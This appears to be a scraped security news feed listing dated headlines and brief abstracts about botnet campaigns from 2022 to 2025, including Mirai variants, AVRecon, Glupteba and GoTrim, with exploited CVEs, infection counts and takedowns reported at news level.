Botnet
May 14, 2025
High Risk Warning for Windows Ecosystem: New Botnet Family HTTPBot is Expanding Full Text
Abstract
HTTPBot is a newly identified Trojan botnet written in Go, first detected in August 2024 and named by NSFOCUS Fuying Lab for its use of HTTP-based DDoS techniques. It has rapidly expanded, issuing over 200 attack commands by April 2025.NSFocus Global
April 29, 2025
Outlaw botnet detected in an incident contained by Kaspersky Full Text
Abstract
Outlaw (also known as “Dota”) is a Perl-based crypto mining botnet that typically takes advantage of weak or default SSH credentials for its operations. Telemetry data showed victims across the US, Germany, Italy, Thailand, and more.Secure List
April 10, 2025
AI-Powered AkiraBot Bypasses CAPTCHAs, Spams Websites At Scale Full Text
Abstract
AkiraBot is designed to post AI-generated spam messages in chats, comments, and contact forms, tailored to the targeted website’s content to promote dubious Search Engine Optimization (SEO) services such as Akira and ServicewrapGO..Sentinel One
March 6, 2025
BadBox Malware Disrupted on 500K Infected Android Devices Full Text
Abstract
The BadBox Android malware botnet has been disrupted again by removing 24 malicious apps from Google Play and sinkholing communications for half a million infected devices.Bleeping Computer
March 1, 2025
Vo1d malware botnet grows to 1.6 million Android TVs worldwide Full Text
Abstract
A new variant of the Vo1d malware botnet has grown to 1,590,299 infected Android TV devices across 226 countries, recruiting devices as part of anonymous proxy server networks.Bleeping Computer
February 26, 2025
PolarEdge Botnet: 2,000+ IoT Devices Infected Full Text
Abstract
The botnet has infected over 2,000 devices globally and has been active since at least late 2023. The attack campaign exploits CVE-2023-20118, a remote code execution (RCE) vulnerability affecting multiple Cisco Small Business Router models.Security Online
January 22, 2025
Mirai Variant Murdoc Botnet Exploits AVTECH IP Cameras and Huawei Routers Full Text
Abstract
The campaign is known to be active since at least July 2024, with over 1,370 systems infected to date. A majority of the infections have been located in Malaysia, Mexico, Thailand, Indonesia, and Vietnam.The Hacker News
January 20, 2025
Python-Based Bots Exploiting PHP Servers Fuel Gambling Platform Proliferation Full Text
Abstract
The attack chains particularly involve attempts to deploy GSocket by leveraging web pre-existing web shells installed on already compromised servers. Most of the attacks have been found to single out servers running the popular LMS, Moodle.The Hacker News
January 18, 2025
IoT Botnet Linked to Large-scale DDoS Attacks Since the End of 2024 Full Text
Abstract
The botnet comprises malware variants derived from Mirai and Bashlite and infects IoT devices by exploiting vulnerabilities and weak credentials. The primary devices used in the botnet were wireless routers and IP cameras from well-known brands.Trend Micro
January 8, 2025
New Mirai Botnet Targets Industrial Routers with Zero-Day Exploits Full Text
Abstract
A relatively new Mirai-based botnet has been growing in sophistication and is now leveraging zero-day exploits for security flaws in industrial routers and smart home devices.Bleeping Computer
January 6, 2025
CryptBot Spread via Websites Promising Cracked Software Full Text
Abstract
CryptBot exploits search engine optimization (SEO) and partnerships with other malware operators to propagate its reach. CryptBot primarily spreads through websites offering fake cracked software.Intrinsec
December 28, 2024
FICORA and Kaiten Botnets Exploit Old D-Link Vulnerabilities for Global Attacks Full Text
Abstract
Cybersecurity researchers are warning about a spike in malicious activity that involves roping vulnerable D-Link routers into two different botnets, a Mirai variant dubbed FICORA and a Kaiten (aka Tsunami) variant called CAPSAICIN.Cyware
December 10, 2024
Socks5Systemz Botnet Powers Illegal Proxy Service with 85,000+ Hacked Devices Full Text
Abstract
The primary objective of the malware is to turn compromised systems into proxy exit nodes, which are then advertised for other actors, typically cybercriminals who are looking to obscure the source of their attacks.The Hacker News
November 29, 2024
XorBot Botnet Resurfaces with Advanced Evasion and Exploits, Threatens IoT Devices Full Text
Abstract
XorBot operators have shifted their focus to profitability, openly advertising distributed denial-of-service (DDoS) attacks as a service under the alias “Masjesu Botnet.” They use Telegram for recruiting customers and promoting services.Security Online
November 26, 2024
PROSPERO & Proton66: Tracing Uncovering the Links Between Bulletproof Hosting Networks Full Text
Abstract
Intrinsec’s analysis reveals operational similarities between PROSPERO and Proton66. Both systems share nearly identical peering agreements and are linked to the same internet exchange point in St. Petersburg.Intrinsec
November 19, 2024
Ngioweb Botnet Fuels NSOCKS Residential Proxy Network Exploiting IoT Devices Full Text
Abstract
Two-thirds of these proxies are based in the U.S." "The network maintains a daily average of roughly 35,000 working bots, with 40% remaining active for a month or longer.The Hacker News
September 20, 2024
Experts Warn of China-Linked APT’s Raptor Train IoT Botnet Full Text
Abstract
The attribution of the Raptor Train botnet to a Chinese nation-state actor is based on various factors, including operational timelines, targeting sectors aligned with Chinese interests, and the use of the Chinese language.Security Affairs
September 11, 2024
Quad7 Botnet Targets More SOHO and VPN Routers, Media Servers Full Text
Abstract
Quad7 botnet is expanding its reach by targeting additional SOHO devices with custom malware for Zyxel VPN appliances, Ruckus wireless routers, and Axentra media servers, in addition to previously reported TP-Link and ASUS routers.Bleeping Computer
August 15, 2024
New Gafgyt Botnet Variant Targets Weak SSH Passwords for GPU Crypto Mining Full Text
Abstract
A new variant of the Gafgyt botnet has been discovered by cybersecurity researchers, targeting machines with weak SSH passwords to mine cryptocurrency using GPU power. This variant is focusing on servers in cloud native environments.The Hacker News
July 31, 2024
Source Code of Phorpiex Botnet with Anti-AV Capabilities on Sale Full Text
Abstract
The notorious Trik botnet, aka Phorpiex, is being sold in antivirus circles, offering advanced capabilities to evade detection. This C++ botnet includes modules such as a crypto clipper, a USB emitter, and a PE infector targeting crypto wallets.Cybersecurity News
July 10, 2024 – Phishing
Regional Transport Office Themed Phishing Campaign Targets Android Users In India Full Text
Abstract
Phishing messages impersonating the Regional Transport Office have been circulating since 2024, claiming traffic violations and prompting users to download a malicious APK named "VAHAN PARIVAHAN.apk".Cyble As CISOs Grapple with the C-Suite, Job Satisfaction Takes a Hit Full Text
Abstract
Research shows that 75% of CISOs are considering a job change due to various challenges and pressures. CISOs often face accountability for cyber incidents and compliance failures, leading to discontent.Cybersecurity Dive
August 28, 2023
KmsdBot Malware Gets an Upgrade: Now Targets IoT Devices with Enhanced Capabilities Full Text
Abstract
An updated version of a botnet malware called KmsdBot is now targeting Internet of Things (IoT) devices, simultaneously branching out its capabilities and the attack surface. "The binary now includes support for Telnet scanning and support for more CPU architectures," Akamai security researcher Larry W. Cashdollar said in an analysis published this month. The latest iteration, observed since July 16, 2023, comes months after it emerged that the botnet is being offered as a DDoS-for-hire service to other threat actors. The fact that it's being actively maintained indicates its effectiveness in real-world attacks. KmsdBot was first documented by the web infrastructure and security company in November 2022. It's mainly designed to target private gaming servers and cloud hosting providers, although it has since set its eyes on some Romanian government and Spanish educational sites. The malware is designed to scan random IP addresses for open SSH ports andThe Hacker News
August 25, 2023
Whiffy Recon malware triangulates the position of infected systems via Wi-Fi Full Text
Abstract
Experts observed the SmokeLoader malware delivering a new Wi-Fi scanning malware strain dubbed Whiffy Recon. Secureworks Counter Threat Unit (CTU) researchers observed the Smoke Loader botnet dropping a new Wi-Fi scanning malware named Whiffy Recon....Security Affairs
August 11, 2023
Gafgyt botnet is targeting EoL Zyxel routers Full Text
Abstract
Researchers warn that the Gafgyt botnet is actively exploiting a vulnerability impacting the end-of-life Zyxel P660HN-T1A router. A variant of the Gafgyt botnet is actively attempting to exploit a vulnerability, tracked as CVE-2017-18368 (CVSS v3: 9.8),...Security Affairs
July 31, 2023
Experts link AVRecon bot to the malware proxy service SocksEscort Full Text
Abstract
The AVRecon botnet relies on compromised small office/home office (SOHO) routers since at least May 2021. In early July, researchers from Lumen Black Lotus Labs discovered the AVRecon botnet that targets small office/home office (SOHO) routers and infected...Security Affairs
July 31, 2023
AVRecon Botnet Leveraging Compromised Routers to Fuel Illegal Proxy Service Full Text
Abstract
More details have emerged about a botnet called AVRecon , which has been observed making use of compromised small office/home office (SOHO) routers as part of a multi-year campaign active since at least May 2021. AVRecon was first disclosed by Lumen Black Lotus Labs earlier this month as malware capable of executing additional commands and stealing victim's bandwidth for what appears to be an illegal proxy service made available for other actors. It has also surpassed QakBot in terms of scale, having infiltrated over 41,000 nodes located across 20 countries worldwide. "The malware has been used to create residential proxy services to shroud malicious activity such as password spraying, web-traffic proxying, and ad fraud," the researchers said in the report. This has been corroborated by new findings from KrebsOnSecurity and Spur.us, which last week revealed that "AVrecon is the malware engine behind a 12-year-old service called SocksEscort, which rents hackeThe Hacker News
July 22, 2023
Multiple DDoS botnets were observed targeting Zyxel devices Full Text
Abstract
Researchers warn of several DDoS botnets exploiting a critical flaw tracked as CVE-2023-28771 in Zyxel devices. Fortinet FortiGuard Labs researchers warned of multiple DDoS botnets exploiting a vulnerability impacting multiple Zyxel firewalls. The...Security Affairs
July 19, 2023
Ukraine’s cyber police dismantled a massive bot farm spreading propaganda Full Text
Abstract
The Cyber Police Department of the National Police of Ukraine dismantled a massive bot farm and seized 150,000 SIM cards. A gang of more than 100 individuals used fake social network accounts to conduct disinformation and psychological operations...Security Affairs
July 14, 2023
New AVrecon botnet remained under the radar for two years while targeting SOHO Routers Full Text
Abstract
A new malware dubbed AVrecon targets small office/home office (SOHO) routers, it infected over 70,000 devices from 20 countries. Lumen Black Lotus Labs uncovered a long-running hacking campaign targeting SOHO routers with a strain of malware dubbed AVrecon. The...Security Affairs
July 13, 2023
TeamTNT’s Silentbob Botnet Infecting 196 Hosts in Cloud Attack Campaign Full Text
Abstract
As many as 196 hosts have been infected as part of an aggressive cloud campaign mounted by the TeamTNT group called Silentbob . "The botnet run by TeamTNT has set its sights on Docker and Kubernetes environments, Redis servers, Postgres databases, Hadoop clusters, Tomcat and Nginx servers, Weave Scope, SSH, and Jupyter applications," Aqua security researchers Ofek Itach and Assaf Morag said in a report shared with The Hacker News. "The focus this time seems to be more on infecting systems and testing the botnet, rather than deploying cryptominers for profit." The development arrives a week after the cloud security company detailed an intrusion set linked to the TeamTNT group that targets exposed JupyterLab and Docker APIs to deploy the Tsunami malware and hijack system resources to run a cryptocurrency miner. The latest findings suggest a broader campaign and the use of a larger attack infrastructure than previously thought, including various shell scriptThe Hacker News
June 26, 2023
Mirai Variant Targets Multiple IoT Vulnerabilities in Recent Campaign Full Text
Abstract
Unit 42 researchers uncovered a modified version of the Mirai botnet that is actively abusing at least 22 security flaws in devices manufactured by the likes of D-Link, Arris, Zyxel, TP-Link, Tenda, Netgear, and MediaTek. The attackers aim to take control of these devices and utilize them to carry ... Read MoreCyware
June 24, 2023
Researcher Identifies Popular Swing VPN Android App as DDoS Botnet Full Text
Abstract
Swing VPN is a legitimate VPN app developed for Android and iOS systems by Limestone Software Solutions. However, according to researcher Lecromee, the Android version of this app is a DDoS botnet and allegedly harbors malicious intent.Cyware
June 22, 2023
New Mirai botnet targets tens of flaws in popular IoT devices Full Text
Abstract
Since March 2023, Unit 42 researchers have observed a variant of the Mirai botnet spreading by targeting tens of flaws in D-Link, Zyxel, and Netgear devices. Since March 2023, researchers at Palo Alto Networks Unit 42 have observed a new variant of the Mirai...Security Affairs
June 21, 2023
New Condi DDoS botnet targets TP-Link Wi-Fi routers Full Text
Abstract
Researchers discovered a new strain of malware called Condi that targets TP-Link Archer AX21 (AX1800) Wi-Fi routers. Fortinet FortiGuard Labs Researchers discovered a new strain of malware called Condi that was observed exploiting a vulnerability...Security Affairs
June 21, 2023
Tsunami Botnet Found Targeting Unsecured Linux SSH Servers Full Text
Abstract
An unidentified cybercrime group was observed brute-forcing vulnerable Linux SSH servers to drop various malware strains, including the Tsunami DDoS bot. Tsunami, also known as Kaiten, is used by a multitude of threat actors as the source code of the botnet is publicly available. administrator ... Read MoreCyware
June 20, 2023
New Tsunami botnet targets Linux SSH servers Full Text
Abstract
Researchers warn of an ongoing Tsunami DDoS botnet campaign targeting inadequately protected Linux SSH servers. Researchers from AhnLab Security Emergency response Center (ASEC) have uncovered an ongoing hacking campaign, aimed at poorly protected...Security Affairs
June 17, 2023
From Cryptojacking to DDoS Attacks: Diicot Expands Tactics with Cayosin Botnet Full Text
Abstract
Cybersecurity researchers have discovered previously undocumented payloads associated with a Romanian threat actor named Diicot , revealing its potential for launching distributed denial-of-service (DDoS) attacks. "The Diicot name is significant, as it's also the name of the Romanian organized crime and anti-terrorism policing unit ," Cado Security said in a technical report. "In addition, artifacts from the group's campaigns contain messaging and imagery related to this organization." Diicot (née Mexals) was first documented by Bitdefender in July 2021, uncovering the actor's use of a Go-based SSH brute-forcer tool called Diicot Brute to breach Linux hosts as part of a cryptojacking campaign. Then earlier this April, Akamai disclosed what it described as a "resurgence" of the 2021 activity that's believed to have started around October 2022, netting the actor about $10,000 in illicit profits. "The attackers use a long chThe Hacker News
June 12, 2023
IoT Botnet DDoS Attacks Threaten Global Telecom Networks, Nokia Reports Full Text
Abstract
In addition to the rise in botnet-driven DDoS attacks, Nokia's Threat Intelligence Report highlighted a doubling in the number of trojans targeting personal banking information on mobile devices, now accounting for 9% of all infections.Cyware
June 5, 2023
Experts warn of a surge of TrueBot activity in May 2023 Full Text
Abstract
VMware’s Carbon Black Managed Detection and Response (MDR) team observed a surge of TrueBot activity in May 2023. Researchers at VMware’s Carbon Black Managed Detection and Response (MDR) team warn of a surge of TrueBot activity in May 2023. Truebot...Security Affairs
June 05, 2023
Alarming Surge in TrueBot Activity Revealed with New Delivery Vectors Full Text
Abstract
A surge in TrueBot activity was observed in May 2023, cybersecurity researchers disclosed. "TrueBot is a downloader trojan botnet that uses command and control servers to collect information on compromised systems and uses that compromised system as a launching point for further attacks," VMware's Fae Carlisle said . Active since at least 2017, TrueBot is linked to a group known as Silence that's believed to share overlaps with the notorious Russian cybercrime actor known as Evil Corp . Recent TrueBot infections have leveraged a critical flaw in Netwrix auditor ( CVE-2022-31199 , CVSS score: 9.8) as well as Raspberry Robin as delivery vectors. The attack chain documented by VMware, on the other hand, starts off with a drive-by-download of an executable named " update.exe " from Google Chrome, suggesting that users are lured into downloading the malware under the pretext of a software update. Once run, update.exe establishes connections with a kThe Hacker News
June 02, 2023
New Botnet Malware ‘Horabot’ Targets Spanish-Speaking Users in Latin America Full Text
Abstract
Spanish-speaking users in Latin America have been at the receiving end of a new botnet malware dubbed Horabot since at least November 2020. "Horabot enables the threat actor to control the victim's Outlook mailbox, exfiltrate contacts' email addresses, and send phishing emails with malicious HTML attachments to all addresses in the victim's mailbox," Cisco Talos researcher Chetan Raghuprasad said . The botnet program also delivers a Windows-based financial trojan and a spam tool to harvest online banking credentials as well as compromise Gmail, Outlook, and Yahoo! webmail accounts to blast spam emails. The cybersecurity firm said a majority of the infections are located in Mexico, with limited victims identified in Uruguay, Brazil, Venezuela, Argentina, Guatemala, and Panama. The threat actor behind the campaign is believed to be in Brazil. Targeted users of the ongoing campaign primarily span accounting, construction and engineering, wholesale distributioThe Hacker News
June 2, 2023
New botnet Horabot targets Latin America Full Text
Abstract
A new botnet malware dubbed Horabot is targeting Spanish-speaking users in Latin America since at least November 2020. Cisco Talos researchers were observed deploying a previously unidentified botnet, dubbed Horabot, that is targeting Spanish-speaking...Security Affairs
June 1, 2023
Widespread exploitation by botnet operators of Zyxel firewall flaw Full Text
Abstract
Threat actors are actively exploiting a command injection flaw, tracked as CVE-2023-28771, in Zyxel firewalls to install malware. Threat actors are actively attempting to exploit a command injection vulnerability, tracked as CVE-2023-28771, that impacts...Security Affairs
June 01, 2023
Active Mirai Botnet Variant Exploiting Zyxel Devices for DDoS Attacks Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a recently patched critical security flaw in Zyxel gear to its Known Exploited Vulnerabilities ( KEV ) catalog, citing evidence of active exploitation. Tracked as CVE-2023-28771 (CVSS score: 9.8), the issue relates to a command injection flaw impacting different firewall models that could enable an unauthenticated attacker to execute arbitrary code by sending a specially crafted packet to the device. Zyxel addressed the security defect as part of updates released on April 25, 2023. The list of impacted devices is below - ATP (versions ZLD V4.60 to V5.35, patched in ZLD V5.36) USG FLEX (versions ZLD V4.60 to V5.35, patched in ZLD V5.36) VPN (versions ZLD V4.60 to V5.35, patched in ZLD V5.36), and ZyWALL/USG (versions ZLD V4.60 to V4.73, patched in ZLD V4.73 Patch 1) The Shadowserver Foundation, in a recent tweet , said the flaw is "being actively exploited to build a Mirai-like botnet " since MThe Hacker News
May 26, 2023
Dark Frost Botnet targets the gaming sector with powerful DDoS Full Text
Abstract
Researchers spotted a new botnet dubbed Dark Frost that is used to launch distributed denial-of-service (DDoS) attacks against the gaming industry. Researchers from Akamai discovered a new botnet called Dark Frost that was employed in distributed...Security Affairs
May 25, 2023
Dark Frost Botnet Launches Devastating DDoS Attacks on Gaming Industry Full Text
Abstract
A new botnet called Dark Frost has been observed launching distributed denial-of-service (DDoS) attacks against the gaming industry. "The Dark Frost botnet, modeled after Gafgyt, QBot, Mirai, and other malware strains, has expanded to encompass hundreds of compromised devices," Akamai security researcher Allen West said in a new technical analysis shared with The Hacker News. Targets include gaming companies, game server hosting providers, online streamers, and even other gaming community members with whom the threat actor has interacted directly. As of February 2023, the botnet comprises 414 machines running various instruction set architectures such as ARMv4, x86, MIPSEL, MIPS, and ARM7. Botnets are usually made up of a vast network of compromised devices around the world. The operators tend to use the enslaved hosts to mine cryptocurrency, steal sensitive data, or harness the collective internet bandwidth from these bots to knock down other websites and internThe Hacker News
May 14, 2023
The latest variant of the RapperBot botnet adds cryptojacking capabilities Full Text
Abstract
FortiGuard Labs Researchers spotted new samples of the RapperBot botnet that support cryptojacking capabilities. FortiGuard Labs researchers have discovered new samples of the RapperBot bot that added cryptojacking capabilities. Researchers from...Security Affairs
May 9, 2023
Fortinet warns of a spike of the activity linked to AndoryuBot DDoS botnet Full Text
Abstract
A DDoS botnet dubbed AndoryuBot has been observed exploiting an RCE, tracked as CVE-2023-25717, in Ruckus access points. FortiGuard Labs researchers have recently observed a spike in attacks attempting to exploit the Ruckus Wireless Admin remote code...Security Affairs
May 4, 2023
An Overview of Malicious Activities in Q1; Telegram Bots in Spotlight Full Text
Abstract
A new report by Cofense revealed that the volume of malicious campaigns utilizing Telegram bots in Q1 2023 exceeded that of Q4 2022 by 397% and surpassed the entire volume of 2022 by 310%. Additionally, YouTube was listed in the top 10 domains being used by threat actors to launch redirect phishing ... Read MoreCyware
April 26, 2023
Mirai Botnet Variant Explores TP-Link to Grow its Army of DDoS Devices Full Text
Abstract
The Mirai botnet operators were seen abusing CVE-2023-1389, a vulnerability in the TP-Link Archer A21 (AX1800) WiFi router, and trying to make those devices part of their future DDoS attacks. The initial study of the attack infrastructure revealed targeted devices in the Eastern Europe region, howe ... Read MoreCyware
April 26, 2023
The Anatomy of a Scalping Bot: NSB Was Copped! Full Text
Abstract
For the past eight years, NSB has been used by bot operators to acquire limited edition and hard-to-find items from over 100 online shops. It's considered one of the best scalping bots available on the market, with an annual price of $499.Cyware
April 25, 2023
A new Mirai botnet variant targets TP-Link Archer A21 Full Text
Abstract
Mirai botnet started exploiting the CVE-2023-1389 vulnerability (aka ZDI-CAN-19557/ZDI-23-451) in TP-Link Archer A21 in recent attacks. Last week, the Zero Day Initiative (ZDI) threat-hunting team observed the Mirai botnet attempting to exploit the CVE-2023-1389...Security Affairs
April 3, 2023
Moobot botnet spreads by targeting Cacti and RealTek flaws Full Text
Abstract
The Moobot botnet is actively exploiting critical vulnerabilities in Cacti, and Realtek in attacks in the wild. FortiGuard Labs researchers observed an ongoing hacking campaign targeting Cacti (CVE-2022-46169) and Realtek (CVE-2021-35394) vulnerabilities...Security Affairs
March 21, 2023
New ShellBot bot targets poorly managed Linux SSH Servers Full Text
Abstract
New ShellBot DDoS bot malware, aka PerlBot, is targeting poorly managed Linux SSH servers, ASEC researchers warn. AhnLab Security Emergency response Center (ASEC) discovered a new variant of the ShellBot malware that was employed in a campaign that...Security Affairs
March 17, 2023
HinataBot, a new Go-Based DDoS botnet in the threat landscape Full Text
Abstract
A new Golang-based DDoS botnet, tracked as HinataBot, targets routers and servers by exploiting known vulnerabilities. Akamai researchers spotted a new DDoS Golang-based botnet, dubbed HinataBot, which has been observed exploiting known flaws...Security Affairs
March 13, 2023
Golang-Based Botnet GoBruteforcer targets web servers Full Text
Abstract
A recently discovered Golang-based botnet, dubbed GoBruteforcer, is targeting web servers running FTP, MySQL, phpMyAdmin, and Postgres services Researchers from Palo Alto Networks Unit 42 recently discovered a Golang-based botnet, tracked as GoBruteforcer,...Security Affairs
March 11, 2023
Prometei botnet evolves and infected +10,000 systems since November 2022 Full Text
Abstract
A new version of the Prometei botnet has infected more than 10,000 systems worldwide since November 2022, experts warn. Cisco Talos researchers reported that the Prometei botnet has infected more than 10,000 systems worldwide since November 2022....Security Affairs
March 11, 2023
GoBruteforcer: Golang-Based Botnet Actively Harvests Web Servers Full Text
Abstract
Go programming language is a newer language that’s becoming more popular with malware programmers. It has proven to be versatile enough to develop all kinds of malware, including ransomware, stealers or remote access trojans (RATs).Cyware
March 10, 2023
New Version of Prometei Botnet Infects Over 10,000 Systems Worldwide Full Text
Abstract
An updated version of a botnet malware called Prometei has infected more than 10,000 systems worldwide since November 2022. The infections are both geographically indiscriminate and opportunistic, with a majority of the victims reported in Brazil, Indonesia, and Turkey. Prometei, first observed in 2016, is a modular botnet that features a large repertoire of components and several proliferation methods, some of which also include the exploitation of ProxyLogon Microsoft Exchange Server flaws. It's also notable for avoiding striking Russia, suggesting that the threat actors behind the operation are likely based in the country. The cross-platform botnet's motivations are financial, primarily leveraging its pool of infected hosts to mine cryptocurrency and harvest credentials. The latest variant of Prometei (called v3) improves upon its existing features to challenge forensic analysis and further burrow its access on victim machines, Cisco Talos said in a report shareThe Hacker News
February 22, 2023
The number of devices infected by the MyloBot botnet is rapidly increasing Full Text
Abstract
Researchers warn that the MyloBot botnet is rapidly spreading and it is infecting thousands of systems worldwide. The MyloBot botnet has been active since 2017 and was first detailed by cybersecurity firm Deep Instinct in 2018. MyloBot is a highly...Security Affairs
February 21, 2023
MyloBot Botnet Spreading Rapidly Worldwide: Infecting Over 50,000 Devices Daily Full Text
Abstract
A sophisticated botnet known as MyloBot has compromised thousands of systems, with most of them located in India, the U.S., Indonesia, and Iran. That's according to new findings from BitSight, which said it's "currently seeing more than 50,000 unique infected systems every day," down from a high of 250,000 unique hosts in 2020. Furthermore, an analysis of MyloBot's infrastructure has found connections to a residential proxy service called BHProxies, indicating that the compromised machines are being used by the latter. MyloBot, which emerged on the threat landscape in 2017, was first documented by Deep Instinct in 2018, calling out its anti-analysis techniques and its ability to function as a downloader. "What makes Mylobot dangerous is its ability to download and execute any type of payload after it infects a host," Lumen's Black Lotus Labs said in November 2018. "This means at any time it could download any other type of malware thThe Hacker News
February 17, 2023
New Mirai Botnet Variant ‘V3G4’ Exploiting 13 Flaws to Target Linux and IoT Devices Full Text
Abstract
A new variant of the notorious Mirai botnet has been found leveraging several security vulnerabilities to propagate itself to Linux and IoT devices. Observed during the second half of 2022, the new version has been dubbed V3G4 by Palo Alto Networks Unit 42, which identified three different campaigns likely conducted by the same threat actor. "Once the vulnerable devices are compromised, they will be fully controlled by attackers and become a part of the botnet," Unit 42 researchers said . "The threat actor has the capability to utilize those devices to conduct further attacks, such as distributed denial-of-service (DDoS) attacks." The attacks primarily single out exposed servers and networking devices running Linux, with the adversary weaponizing as many as 13 flaws that could lead to remote code execution (RCE). Some of the notable flaws relate to critical flaws in Atlassian Confluence Server and Data Center, DrayTek Vigor routers, Airspan AirSpot, and GeuThe Hacker News
February 16, 2023
Mirai V3G4 botnet exploits 13 flaws to target IoT devices Full Text
Abstract
During the second half of 2022, a variant of the Mirai bot, tracked as V3G4, targeted IoT devices by exploiting tens of flaws. Palo Alto Networks Unit 42 researchers reported that a Mirai variant called V3G4 was attempting to exploit several flaws...Security Affairs
February 9, 2023
Medusa Botnet Goes Through a Major Transformation Full Text
Abstract
Researchers at Cyble uncovered a new Medusa DDoS botnet version based on the leaked Mirai source code. With this, it has appropriated Mirai's DDoS attack choices and Linux targeting capabilities. It comes with a ransomware module and Telnet brute-forcer. Additionally, a dedicated portal now adverti ... Read MoreCyware
February 8, 2023
Qakbot Mechanizes Distribution of Malicious OneNote Documents Full Text
Abstract
Qakbot began using OneNote .one documents (also called “Notebooks” by Microsoft) in their attacks on January 31. On Tuesday, Sophos researchers observed two parallel spam campaigns.Cyware
February 3, 2023
HeadCrab Botnet Targets 1,200 Redis Servers in a New Elusive Campaign Full Text
Abstract
Aqua Security researchers found a new malware, dubbed HeadCrab, that has infected over a thousand Redis servers since September 2021. Researchers found approximately 1,200 actively infected servers that it has been abusing to mine Monero cryptocurrency. HeadCrab uses state-of-the-art infrastructure ... Read MoreCyware
January 25, 2023
Ticketmaster Blames Bots in Taylor Swift ‘Eras’ Tour Debacle Full Text
Abstract
This week, Ticketmaster testified in Senate Judiciary Committee hearings that it's not the company's monopoly on the live music market that caused the Swifty sales collapse — it was instead a cyberattack, executives said.Cyware
December 23, 2022
IcedID Botnet Distributors Abuse Google PPC to Distribute Malware Full Text
Abstract
Trend Micro researchers say that malicious actors are using malvertising to distribute the IcedID malware via cloned webpages of legitimate organizations and well-known applications.Cyware
December 22, 2022
A new Zerobot variant spreads by exploiting Apache flaws Full Text
Abstract
Microsoft spotted an upgraded variant of the Zerobot botnet that spreads by exploiting Apache vulnerabilities. Microsoft Threat Intelligence Center (MSTIC) researchers discovered a new variant of the Zerobot botnet (aka ZeroStresser) that was improved...Security Affairs
December 20, 2022
Glupteba Botnet Rises from the Dead Full Text
Abstract
Experts at Nozomi Networks announced that they spotted an ongoing Glupteba botnet campaign, starting June 2022. Just a year ago, Google had claimed to dismantle the botnet’s infrastructure. Glupteba operators used the Bitcoin blockchain for hiding C&C domains, making it resilient to takedown ef ... Read MoreCyware
December 19, 2022
Glupteba botnet is back after Google disrupted it in December 2021 Full Text
Abstract
The Glupteba botnet is back, researchers reported a surge in infection worldwide after Google disrupted its operation in 2021. In December 2021, Google announced it has taken down the infrastructure operated by the Glupteba botnet, it also sued...Security Affairs
December 19, 2022
Glupteba botnet is back after Google disrupted it in December 2021 Full Text
Abstract
The blockchain-enabled botnet has been active since at least 2011, researchers estimated that the Glupteba botnet was composed of more than 1 million Windows PCs around the world as of December 2021.Cyware
December 16, 2022
MCCrash botnet targets private Minecraft servers, Microsoft warns Full Text
Abstract
Microsoft announced that a botnet dubbed MCCrash is launching distributed denial-of-service (DDoS) attacks against private Minecraft servers. Microsoft spotted a cross-platform botnet, tracked as MCCrash, which has been designed to launch distributed...Security Affairs
December 15, 2022
GoTrim Brute Forcer Botnet Scans Internet for WordPress Sites Full Text
Abstract
FortiGuard Labs identified an ongoing, previously unseen CMS scanner and brute forcer, dubbed GoTrim, installed in infected WordPress sites on Linux systems. The botnet detects and evades anti-bot techniques used by web hosting providers and CDNs, such as Cloudflare and SiteGround. WordPr ... Read MoreCyware
December 14, 2022
GoTrim botnet actively brute forces WordPress and OpenCart sites Full Text
Abstract
Researchers discovered a new Go-based botnet, dubbed GoTrim, attempting to brute force WordPress websites. Fortinet FortiGuard Labs researchers spotted a new Go-based botnet, dubbed GoTrim, that has been spotted scanning and brute-forcing WordPress...Security Affairs
December 13, 2022
New GoTrim botnet brute forces WordPress site admin accounts Full Text
Abstract
A new Go-based botnet malware named 'GoTrim' is scanning the web for self-hosted WordPress websites and attempting to brute force the administrator's password and take control of the site.BleepingComputer
December 7, 2022
New Go-based botnet Zerobot exploits dozens of flaws Full Text
Abstract
Researchers discovered a new Go-based botnet called Zerobot that exploits two dozen security vulnerabilities IoT devices. Fortinet FortiGuard Labs researchers have discovered a new Go-based botnet called Zerobot that spreads by exploiting two dozen...Security Affairs
November 30, 2022
Cybersecurity researchers take down DDoS botnet by accident Full Text
Abstract
While analyzing its capabilities, Akamai researchers have accidentally taken down a cryptomining botnet that was also used for distributed denial-of-service (DDoS) attacks.BleepingComputer
November 27, 2022
Black Basta and Qakbot Join Hands to Attack U.S. Companies Full Text
Abstract
Cybereason researchers identified widespread Qakbot (QBot or Pinkslipbot) campaigns targeting U.S.-based companies. The Black Basta ransomware gang is behind these recent campaigns.Cyware Alerts - Hacker News
November 26, 2022
All You Need to Know About Emotet in 2022 Full Text
Abstract
For 6 months, the infamous Emotet botnet has shown almost no activity, and now it's distributing malicious spam. Let's dive into details and discuss all you need to know about the notorious malware to combat it. Why is everyone scared of Emotet? Emotet is by far one of the most dangerous trojans ever created. The malware became a very destructive program as it grew in scale and sophistication. The victim can be anyone from corporate to private users exposed to spam email campaigns. The botnet distributes through phishing containing malicious Excel or Word documents. When users open these documents and enable macros, the Emotet DLL downloads and then loads into memory. It searches for email addresses and steals them for spam campaigns. Moreover, the botnet drops additional payloads, such as Cobalt Strike or other attacks that lead to ransomware. The polymorphic nature of Emotet, along with the many modules it includes, makes the malware challenging to identify. The EmotetThe Hacker News
November 22, 2022
Botnet Turned InfoStealer Aurora Gaining Traction Among Threat Actors Full Text
Abstract
Aurora is a Golang-based info-stealer, which runs several commands upon execution through WMIC to collect basic host information, snaps a desktop image, and exfiltrates data to the C2 server.Cyware Alerts - Hacker News
November 21, 2022
QBot Uses DLL Hijacking, Abuses Control Panel Executable In a Fresh Attack Wave Full Text
Abstract
The malware quietly runs in the background, steals emails for use in phishing attacks, and downloads additional post-exploitation toolkits such as Brute Ratel or Cobalt Strike.Cyware Alerts - Hacker News
November 21, 2022
Google Wins Lawsuit Against Russians Linked to Blockchain-based Glupteba Botnet Full Text
Abstract
Google has won a lawsuit filed against two Russian nationals in connection with the operation of a botnet called Glupteba , the company said last week. The U.S. District Court for the Southern District of New York imposed monetary sanctions against the defendants and their U.S.-based legal counsel. The defendants have also been asked to pay Google's attorney fees. The defendants' move to press sanctions against Google was denied. The development comes nearly a year after the tech giant took down the malware's command-and-control infrastructure and initiated legal proceedings against Dmitry Starovikov and Alexander Filippov , who are said to have been in charge of running the illegal botnet. The defendants, along with 15 others, have also been accused of using the malware to create a hacked network of devices to mine cryptocurrencies, harvest victims' personal and financial data, and place disruptive ads. Gluteba is distinguished from its botnet counterparts bThe Hacker News
November 16, 2022
Updated RapperBot malware targets game servers in DDoS attacks Full Text
Abstract
